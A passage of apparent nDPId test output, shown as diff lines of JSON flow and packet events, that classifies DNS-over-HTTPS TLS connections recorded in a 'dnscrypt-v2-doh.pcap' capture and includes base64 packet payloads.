{"version":"TLSv1.3","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":140,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311566,"flow_last_seen":946739311603,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3189,"flow_avg_l4_payload_len":1594,"midstream":1,"thread_ts_msec":946739311603,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
02347{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":946739311604,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1444,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1444,"pkt_l4_len":1410,"thread_ts_msec":946739311604,"pkt":"ZmZmZmZmRERERERECABFAAWWg4FAADQGf2a5hsQ3CgAAAQG72BqMAvZEFNMFiFAYAfXAzwAArcpCfmGLOKjDkyzsTe+IPkiqYnruzR41MPuGsz88MQqvC3a9HfwXJ6lzqQ4rCWJcWhWOM\/faQczL\/u4LUA47B+3hgIraXqwM7U0QtAPKeofLhsqBn12DazruSHbiIbxy+mEUG3S56+4ZRbB44U5cKRW56AecOVegPdxq19WX7WP4+ZvrOsXSvkcqGqyY6l57+wMNGtK9Hor0ODYeWdBnCWx+J55Yp1BLeNHq9nHIKHj0qCJNcTpuSY3kcxYIKgCzUqmtnXdoJ0GIMlbY2ljKsarNr5cWoMUbBujc0flI7F15VAzRku1eV3Kl\/7Wukzg8w4HiH6xnnC2hyeJ\/S9kg8k3Thktb0MRLph1xkAte3QZc08opc3Fwo1Ft6aRVOUnBzMc2ygQi4cXDCHwkiaI53r8gMzkS7anbEcS4yQcROtN4r2sH3n\/Y2Qw1v5Gb+U\/+RFg8+P9ZzSoFBkttBuC7bMKkuFovtwfD7bmTraXz2TwXRpY3Ao54+\/SNvuV3GwVsY67MLueBEgpQWATGxrbkACZtD4C+lpPBC5\/54MNyZi6y2\/bINiwBN2SHIdC0sG5gR\/DV19ykdqXF3pfYHlmfR3703pqTCdiZz1zhoMZLCPXVwnRt08WzrSf9AJPIVrVED87vfcSxcnSNe9\/uUQ+fPjNxmvMBL8ur1shycxG8A4cFPyuqBeBuBrfVjZFKQN3\/5iT\/qY3bW5kYmBDrHkL2xegzf\/Moa8towjQGmRBeDyc9Fogbi4Bl2lSDI\/x3VZI\/8yRCU0YCrn33V5Yytpt4Nri5jL3CrvqNUKuK49C6RMwZ1n1NkjUcpjeYGCGRXo6SbIn8CHVjiCEwFZ8FbQctAnWvdqfTpT0bXGelftgC9CQThu\/W+ybRqQdwN+K5c2QiXPYvO4kT3LD6oCwacJ4x3t9XRv3AXxYa1UbtXwad0Q5XC17E9XVpbbgKhrlco595yY5V6j1HdG8AkTRI1DXbEp3foy5yEjtW0o9bfHyhwUqC6TBXcyz4z4cHmh5p6A6BMpnvPJtMyGOVMKQ7LtCwwAKXNWcMVkLjSAZ+IrhMtGXoEFJcdmyQxTOI+OfCfdgm6q9yTer0lySMXu3yBMcL6Vn1SuMzS2FSE1aXKAyCBb3XF5Tfnf2rLe4r3hkWTr8Mmu\/+5cpIK1r4NWR0zq6iT\/lnsbxmS39yt3YHMSpG1r36HYatyCzF6kZo6KyW2UJ6fBqDVBmGD6CXSVAKejLC8pL1qmuOu2eXU804WhkOIkczZMz7pQW6C0A+bVJsEuL5Kd7KV\/W2IGcqNMtuMkFf1vHE4VTHRAmWpIDFt5I4ja4qA9N7tAzSWPkgtQseSnNvTrX+nCc0rsjLviAcYafijP+ATzRDOBcDAwEZYz205aORxNiMwaiQeObwk59GyoJ+T+YW4iSATpt8cc0OU+XkwulympL8b+KCt76fJXCt3rgEOglVp2lJQDaaCL0\/EDry33zbH0MtKm5P5nEWpzvQFhaXV1WeS3oS65S\/3UVJT
7\/Hm\/AkB6N0iCgWEeK4i80RHGCYRIweyu9kQIUklvy2RlmccKeVQTq37O+\/HqRcQLsrpTkATqOJMvj0MaZ7zkYReeTUbtUUtzasEHVGtHimiktW2DAjF2G7BrMbQnAbkBNJMIcDNYwAwDUJvD2+j752nnR\/ojUHAoRsnlpRRGw8k7CJ0b0wBSknElPWssxoC\/r5K7w37x9u118AdMWjqtzSlF2uDe2PtsgCUxjOE7EkCZxpOWsXAwMARUyGMct3ItX2QiSoGAs2qAHwCi9mgPaAr45Z5ZYVR5NUAg5k1dXUDUazzqq9GbzXT1\/7OFi8y8eMdJWfTGFw9qor9xL6ew=="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":154,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311703,"flow_last_seen":946739311703,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739311703,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":946739311703,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739311703,"pkt":"REREREREZmZmZmZmCABFAAFIvxBAAL0GjQMKAAABMw980MyiAbu+o\/fohj5JlVAYAfZx1gAAFgMBARsBAAEXAwOEmak1ToTEOPVX0jBh7rLNZM1Gt5\/Gr6ZvrmdHklieHSAP2LkoS3kAHcBOg6onjDU7HEdrdZ3cuMs9iD3w5kCD4AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zbmwuYWxla2JlcmcubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIGzt4\/5xvtyifU6VTcrfvT+YrIEhagkzRKKKlOYdvDd6"} 
-00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311703,"flow_last_seen":946739311703,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739311703,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnsnl.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311703,"flow_last_seen":946739311703,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739311703,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnsnl.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
04400{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":946739311732,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739311732,"pkt":"ZmZmZmZmRERERERECABFAAuAX8dAADUGahUzD3zQCgAAAQG7zKKGPkmVvqP5CFAQAIN8DgAAFgMDAHoCAAB2AwNcTBj+nowDUUbglTTLuZi3m0Fgte272n9LPifxOMv7HCAP2LkoS3kAHcBOg6onjDU7HEdrdZ3cuMs9iD3w5kCD4BMBAAAuADMAJAAdACCPdFwMNjRtfUXHati0iPvUS7ZISUYNc1KeHBUbO8YTWwArAAIDBBQDAwABARcDAwte+JJAD4P7EW1qK\/KMQB2haaLigWKb\/DYNFwlVC4RO51bq0M8eao6QlrOrDJOFceHVJKhl1p8Ibfrg\/vTRNCJB\/UcW+Fedt+hD1iuUDwTCFZavOS7xwPDkL6497l\/MLuLG4DXgnGeZQ+ANIJd3qmkp82hmnma4vPPfih3FXm2d\/orPnXJKqjQROYWvMcbtvj9Ebb\/txBSHxVMCrKgG408ySWMQj9wSJ3YFhq0yzQL4\/vZaLuRC+Soen8TCR9PMAvnOESL67SWkKNvrhHs7A8wve1+FS4QJZG0DVnfyZjC1lTDakOFEVj8uyQCDIeUSTCCRymHyRKKDInznJ9K1ylbbeIGdenKpQOC\/PvdDSl7uxqaByB3NSIma+imeWtGfSsSVz2bgzfRCO+1shU4LOWr+fJj4VfVm44ziFmXpQXba4f4sLTdWNOjDqe5hsphKeTPq6cjwHY\/8d4YQO1mASNyJu5PHaom1vL8or5mJSUE6nK9PPUFEoI+arXXrdILbrGh6AFzUXQGBrrAdekMh3lpPbuWJTMnyJ+tNhczzi4OaeErbR+eZBtyO483ig0A5ofFGX3QqSY+x\/jYa34H7RpPgi7E73Kv3qvag06VhkcjqWXPokFDtuDpOCx1sHam7i\/mBXaEeSIMn\/6ibfBibK8Ssyhd351G+u7nIG\/kPMrFG9dX2lYQXotCoRmApyZWnnIvnb1Ems9MFs1nWg90WJfHxHinrSdpjBeU8iAbpS\/jrwrYxGk3gVDAv9VGAkZlRz60RiJgOn74olT+JGbdB87Dmd8zXzGHRAs6xX1wLyFHdLBSPxN+wXikNtBamIrek5su\/OhIPfJ9Db8D4NRmo2RQxqPr7fuFEkduV14PFpTKUsiEOkhDJwNg8LiATZ7RVwMg6yMpsydYcgvfMea751TpJNvE95FINDC3Rb\/\/f0HmE4sSUBcBPMBavqAtQ7YhyYupjzYKChAX9lCvR4V0MA3gDeswYrL6CJ2QWYyZ1X5kp+MoOy0A6lbwTY6FAqgtyYhKr1esD7uta6z13oZTeC8zVTDF3SZq3we2RpHyfhsBTKY94xuStpqoHpzXuf67EN9Ci9BXk7ctHV6chPXxbzfNbfHejhQSWblCUVsEWcGJTaWPfYy8Qk91uEWvknUwg3\/gnkTaxOpg74KZR+eQhsLtgXu83uRIpmos4uiAQqNFCr46gFv66IhjUaLn++05xvOtQF+pJff5ceYA3+HVtzS7siCW14iQ0F2g+nmUdK\/l5e2iBJ9jUDVjX1gbsI6q3sWAVlaZSWaqGUPI7tEUJQO+uLheM+t5WJ2hIuHlBrb7V9x7oPe\/w4J
yh22GAaILXTviEQ++5bF7t0H5J22\/uU82cBtUmtPnPK980jnCJpoWHcd5b8NrM+3vBCp31WdecAix\/bw5hrhpdYb3Wuo00LpEwMw5n1XbAIEscw8D\/TDkT3R8DdqFFvsOwEJgVupjA7F1prq8T49hiTkdYl+giz2p0Ayt4KR\/SKb+oWG3y4ZtrykubZr+Qfc18G7yRy1UzXXJ7wFTK5WhTLREjxeCpH6IaQ2zDQ5+I3brP682k2XRTd3nMiVhZaMNZjB3MO3yAICh5zK9ucc+onrCYJIYI\/CtjBj1mJ\/oiWvsTssUIxMNevGNJc8s34PU+GVpiWU7G1gOq2\/oHbQNmNjM6utdbIKFu2BrwDIIIyRNAnfbb8mkTirEZY8JOBVWtUMwNF2wWG\/znmaTdvsV5XVYinNGBvCLJ4cl4jpIhiQHJif7TdKLHCM1mnqE7oXlP0MjNOI8YrXpYFJApJqV+nQMhEAl320hWRRZS9jvtYuADMZM\/zqsrhOwTRUYvn5TUWPPSLkDCWWQT\/boP1Zrm7ipJ29gjQr5TspKmpn4J6SGBQtqSqLcPrjFY1FGqzT0Cxa7I4qGdQmb7BlBoZsZba4XtkUxqQDb7GQ7lF9QZ8stU169sKy3x8YQd1brzqNHrkIJDSvbZZhCJGpijHPtgp\/QG6Dw2\/BImDmY1tBmkVrEm\/bZ+xumAD64t1fYO7WaWjuGbU0Y+9l0+9zDoVeHa476WXFF01qNlSxZZAxFkrGmva65Ha2zNip3N87qP3nyH+3kbjqzMKrpNdw3pOcpWv+PdRxpJZGkBM4aT6LXbJdAxBLLkkepjX3bVMWm9bedod1MvUUZQHAIRVofMSy8iwjG593htNanCQUBVZUhdnlVrmQD4OR5EjaE0aFJSUsVHU2VO9DX1cb2EnPoiZIzX378PPrzLoeda6yE90ZvWYSJeMUQJgjFljjq1Vmv7zPz+m4Us7Q\/oFgLEuTkw4eq\/OB+aA8STNn4AHoTw1B57\/koj\/Tsd4yxadruMqmxj8G0neUx2FN2AmiTBa4RjoLGNzELD8QTXTHG2\/lxfzCVwHvLq9JxQf3uprD59F8Loph7ycBJ+j\/BoYH+iVGt+6GzZ563iyu9UeY0+AiljVO0GFvxbuhFk79OBcmYfgnlTvugErVv1eoGzzwF3KK3N67S4ysk\/cJIT\/DoRZvga\/lMRKstxDLEaDolPIBoEiu4mAsdPBxa5KjB\/uaPK\/Gvldfb7QWo\/hvHLZAM3qCGVxLZ4OSPZzTuJ4fJWIQaOXTrFJVv4TYo67KpO9uvbnZUtP8hCVop9O2qXs\/NKl69+XIEhMfw1KYOxJAcgDxH4xjWm9TWAA+DhZvFs31qLGWSu3CzrM+geUCeE\/Vlrc8pmCZFikrptNtJl0uwOfLeuZUF7VWjDr6R5HxdwbmReRnk8DeQUb8\/JzwIyCR78O7TDjY2uL4IEBoTWwTpLR+tDFV4fNsyzL4VzpHaIwnMWTyomGHXhNDLAvBXN5lZAH1nY9D82KvJ+P8HK2FgOErfXrK6gPfonD48R1bCJofrjuMQkEZVQBGqn5ypZTPRu6EwnkBn4q0ARPtqm0QEoQ1VuhulmyIu4zwbE+pgZlGBWhO+4WIy2SuF0h7yFf\/0cbwCehkDSsGDVM9QRwmW02sBUez1\/0Ml7N8nkc2bCsJgo\/fEUXj1TOn7cIchmlzf+MvAjyYfcGhECzHaENxMQIFKZWAib9UAuoVCbRMTYEaO8+NZKwO6bZTHvUzm+gaaUre7sgcCCP\/wfz0OXBRWwpNRR4m\/LwYXSYWMMhKP7tqCCj6OXjzq62VPsWFinT4KE+SZYXF5y6EZay9KdRh4kW7ybiZ7hqI6uqO0\/mKAHQ\/xlXAuQ2EOnYG47KeZUkoht4zFh4Q7AcG7Q0FtDwRhJqM+GVySAg9IbIymkvgNTTZyOY3isJHVYzmKvFAgPib7ERkwsvRQ\/S8
lGEoG+lZogb0KK4PyuRpdocXBa4Io1guVhX2K44\/qHOYqiQPL\/Vb5wtdOiDpag22zTziquJAPx3Cc98vOxAd33lx77fZMHNMz95phNb\/gH\/oBI60jIQ5icFLLZs+m7nP7\/6KXDZlQEY8H6HyN8CbMnqheODed7gRjDQsbXi9MHr27blhbJLCz\/qn8J0uletyL+6GpmTu9W1AZiLdNt26PN\/1uozWEq9dfJLpT7KZnW6S0qvTBGlR4kX8O3fku9pK2qyz9s7t7Ockp7sMMWorJbLnKYK0PgDcQi4HUA+VDHi2RlLA\/XZ9u3fGBeP6zmmrFeEhRc6glZV1JpHMW35YHtgDMlMPiXVu6VYVSboWqwuvKzMobkKuX8tZFxZtF8Qlpv25zGgKwz"} -00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":155,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311703,"flow_last_seen":946739311732,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"thread_ts_msec":946739311732,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dnsnl.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":155,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311703,"flow_last_seen":946739311732,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"thread_ts_msec":946739311732,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dnsnl.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00657{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":946739311734,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":946739311734,"pkt":"ZmZmZmZmRERERERECABFAAC4X8lAADUGdNszD3zQCgAAAQG7zKKGPlTtvqP5CFAYAIMEyQAAeS0tOv0CsE56CKvTlOFyTsi\/xDWjEiSHZ06cNkY05jGBZ0BY+\/8ar9VauCfvuAhmfbkHRsufSt9+BCdWOZTLG2pLv7Rqy1KMbXDj1dE3FFg5TtH6GqR+kavc+JEGFEgehaZ\/FbuVi\/sk8mhzGqOKXx4crPRKN7mN3k61duL6EtdmqASfaRcWFkjwmH\/5s907"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":171,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312203,"flow_last_seen":946739312203,"flow_idle_time":7580000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739312203,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":946739312203,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":946739312203,"pkt":"REREREREZmZmZmZmCABFAAFEaI9AAL0GaqQKAAABdMuz+KL4AbtonCHmRxNJVFAYAfbqtgAAFgMBARcBAAETAwNLJ0LoKZs0jG4db6SH737y8naHXDM3S+mAdGRoYzSPaSD3zYs+eWXICfX4e3zLCPsIhyJf4YitXdBLrNgVR3LKFwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACkAAAAEwARAAAOcnVtcGVsc2VwcC5vcmcABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg33Waic8Yfh0yJ5buIXWM7xt29S4VxDeDA2qvuzRytkE="} -00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312203,"flow_last_seen":946739312203,"flow_idle_time":7580000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739312203,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rumpelsepp.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312203,"flow_last_seen":946739312203,"flow_idle_time":7580000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739312203,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rumpelsepp.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 02422{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":946739312226,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739312226,"pkt":"ZmZmZmZmRERERERECABFAAXUJ6JAADYGLgJ0y7P4CgAAAQG7ovhHE0lUaJwjAlAQAfWSIAAAFgMDAHoCAAB2AwPlxRfYXMEhZdQ8ajfb6CRVs1xCMiaZqVFxrCKnBSpfMSD3zYs+eWXICfX4e3zLCPsIhyJf4YitXdBLrNgVR3LKFxMBAAAuACsAAgMEADMAJAAdACC7U5tcN1lyGmU4zwJoCO50vCXYPM\/QvTMxioFdnZMwahQDAwABARcDAwAgWYRxXowUwkrzaVinqnzWcQ+TBbMUOwCXts50ql211fAXAwMLXdNQugGPXsJ\/8C6qtHlVybUGs7I40LMTA5OhGA+5YDHeNrEuEhv+tu5lin4eHBImQq4kbeHEAo3aNZo3KmURuDQDW8qwTnUEVfBOev0Cp\/PjSdjbD78ol0y5nY2oRm2fbsKHJzJSSjb0AciAo1LrQOgCF2CvMV+eyOyHUYct\/0CZzYMkLxKZwgRjyAJuXMfA4yEKZGM2df01\/BUbSo1Rl+1vGFFUkgKmIgKkRy+Bl\/5\/aUS0H7x+NZdUl10aLbTaEzyxHvC5FKjKyKio8Nq1FnOONx6t6a1NxwFwus79kTDzOhi2RBBAptjB5bREXvI7I78ofmPnYWckOqrJFFwvKuiJMXscIR8meUqP2LfgWzMDMhsH4p0jN+l3Gq+FBd
oxKNoG26O484i0pfOfynG5VCfFmeEmq9XB2jrTV2FwEB1w6FHC1GMZVEK60qV4O+pPgrZRJMZSzwllOfjef8V42EZAcff6ioa4KXyU2Lg36HO0yhYzbeNUU3pAi5\/qwo\/8uuPNfVbKx0eipCjwx5+0hZa74DG\/pD0GzntSqS7YWEdlhEup1mtZmQo0eaDjwGNrCt+ZhJgQy3V2hPBCa6ygW9VMF25ycsILPfVx1AuqPxUOHW4j094S0MBQegEN0J3yWeWaiiBlzmaP9zyQI2IatrzAzhNsYChDHK+csfeO9ThoioAfgwS3AljMljsUX8LckrIXpurphG9MTttyGcbyuYOZgMBCh0hvfGempBEWQ87aRGnYict7DJMJ4ANT6I8mIRYfs9ktyEUtlVvr4PQNKARgob1jc7dcCzVhF1wheYyQGYeS88ndMehrocaatcfPAW+sGsd\/PlwCwZjCKZRZc+RY8UIBMVVQFkJfKmd3vMc6ZdNW+eECwipaKd\/GGSBQQLLSZMZlc2\/fq5kgX+ANS93WhwsRG1d13Nrw0y\/ATREqmOdYnxg9NReWvH6Y9oKaWK0ORmDf6ge12lS9oVHWz42D+xzkGejOSsWciqHXAH+yg6krTEDYRK\/FPbGud1EfOntNRDB8fuTqg6A3gnOVkf5Fe+6Udnrmytaz7VKwjYRLdi7vz2qagJMVcAAVeEuovh5FOb\/1EXijxsxUB7j\/jcKgZC3AwFJv0DQSdWi57X+9030WJdNzGWfONsJDey166z5gtgIr0gWE3XSAHs3+JszFzgP3FC9xVilACKjY2RhRQyvT6fGwve0GSnMhLdXxdeZ6r4BSk1XrmYwxLzeXAWqaNfsfk0zirnPcN6UG26k3lnJ6hvodPS8WtfbDlmo8y38gK+0yMKaENYnpsWQ48t8ZDpKCeCokx5kJ4EaYicnC8gtp5emEtPLOmyhRS\/Kx67Xu26y0PrFyj7Ld8XnP+XpwQqAHuqyPPLcA7ULfoMWkppyHnn9L21Mz+6Ml1h7gnl\/ZwxToT4wqDJUExA47\/9+7Gr\/oh5kj8z6qG0LWqBHYWfEqQZ9C6c64n2xAiBIjVtW2HmMJDocq5nLsWLSEY96ngephvH\/r2i4gA320QycCOlUbe7IShXjhfHajvNFk9aT9mVr+xKfGAIJr4upUShXmjRDRgxjZ9A2ryxbqx35tiU7DJrZpjO\/5DMzEBxvVggb2jlqmTLhZH4TtJi6zfeCLrUu+11tfn0GJzj4HRmOyvzdz8MwTSgWBVisogZKhAqzzkq5ai5YnEcmNOW52YkN74XGWlccUSq2JFZXF"} -00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":172,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739312203,"flow_last_seen":946739312226,"flow_idle_time":7580000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1736,"flow_avg_l4_payload_len":868,"midstream":1,"thread_ts_msec":946739312226,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
